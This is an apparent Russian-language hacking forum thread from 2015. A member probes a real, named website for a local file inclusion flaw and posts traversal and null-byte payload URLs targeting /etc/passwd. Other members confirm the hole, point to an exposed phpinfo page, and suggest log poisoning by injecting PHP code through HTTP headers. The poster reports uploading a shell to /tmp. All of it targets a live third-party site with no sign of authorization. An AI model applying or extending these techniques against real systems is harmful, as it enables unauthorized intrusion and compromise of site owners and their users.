ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

05.11.2015, 15:16
|
|
Новичок
Регистрация: 05.04.2012
Сообщений: 18
Провел на форуме: 3772
Репутация:
7
|
|
Всем привет
Имеется страничка
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=fp_usluge
название параметра запроса намекает на наличие на сайте LFI
пробую следующее:
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=./fp_usluge
страница успешно грузится
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=../fp_usluge
страница не грузится
что еще более намекает на наличие LFI
проверяю, что будет с %00
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=fp_usluge%00
страница не грузится, из чего делаю предположение о том, что параметр с чем-то конкатенируется
теперь пытаюсь заинклюдить /etc/passwd
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=etc/passwd%00
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=../etc/passwd%00
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=../../etc/passwd%00
и так далее
заинклюдить не удалось
в связи с этим несколько вопросов:
На сколько это похоже на LFI? Что такое может быть на сервере, из-за чего мне не удается подключить /etc/passwd? Как его можно раскрутить дальше?
Какие файлы вы пробуете инклюдить на windows серверах? Что потенциально опасного можно сделать с LFI, в том случае, если на сайте нет возможности залить шелл?
Заранее спасибо за ответы
|
|
|

05.11.2015, 16:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме: 835386
Репутация:
1463
|
|
LFI, смотрим
fileName=../lm_links
fileName=../port_featuredprojects
null-byte не будет работать, т.к. версия пропатчена
X-Powered-By: PHP/5.3.29-pl0-gentoo
==
есть phpinfo
fileName=../phpinfo
можно пробовать тему LFI + phpinfo
https://rdot.org/forum/showthread.php?t=1134
==
UPD
LFI + phpinfo() порекомендовал зря, тема хорошая, но не тот случай, конечно.
|
|
|

05.11.2015, 17:31
|
|
Новичок
Регистрация: 05.04.2012
Сообщений: 18
Провел на форуме: 3772
Репутация:
7
|
|
Сообщение от nikp
↑
LFI, смотрим
fileName=../lm_links
fileName=../port_featuredprojects
null-byte не будет работать, т.к. версия пропатчена
X-Powered-By: PHP/5.3.29-pl0-gentoo
То есть такую уязвимость можно эксплуатировать, только если получится залить шелл с расширением .php?
Можно подробнее, что значит версия пропатчена?
|
|
|

05.11.2015, 18:26
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
null-byte использовать не получится. уязвимость исправлена
|
|
|

05.11.2015, 21:00
|
|
Участник форума
Регистрация: 22.12.2011
Сообщений: 170
Провел на форуме: 46938
Репутация:
2
|
|
Можно попробовать найти логи сервера по этой базе дефолтных путей:
/threads/324564/
Потом отправить специальный http пакет с помощью софта InetCrack или HttpREQ:
/threads/121239/
В заголовках пакета разместить PHP-код, он запишется в лог-файл и можно подгрузить его через LFI
|
|
|

06.11.2015, 00:15
|
|
Новичок
Регистрация: 05.04.2012
Сообщений: 18
Провел на форуме: 3772
Репутация:
7
|
|
Сообщение от yarbabin
↑
null-byte использовать не получится. уязвимость исправлена
Я правильно, понял, что нулл-байт актуален для php
[/CODE]
сделали для удобства разработки и забыли убрать?) Как часто встречается подобное? Как вы нашли его?
описанным методом у меня получилось залить шелл в tmp, но мне не ясен момент можно ли заинклудить залитый файл.
предположительно, там написано что-то вроде
Код:
include($_GET['file'] . ".php");
в этом случае я буду пытаться заинклюдить /tmp/blabla.php вместо /tmp/blabla, где реально лежит шелл
Сообщение от {iddqd}
↑
Можно попробовать найти логи сервера по этой базе дефолтных путей:
/threads/324564/
Потом отправить специальный http пакет с помощью софта InetCrack или HttpREQ:
/threads/121239/
В заголовках пакета разместить PHP-код, он запишется в лог-файл и можно подгрузить его через LFI
Интересный подход
Но опять-таки непонятно, как мне найти логи, если дописывается расширение .php и нельзя использовать null byte
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|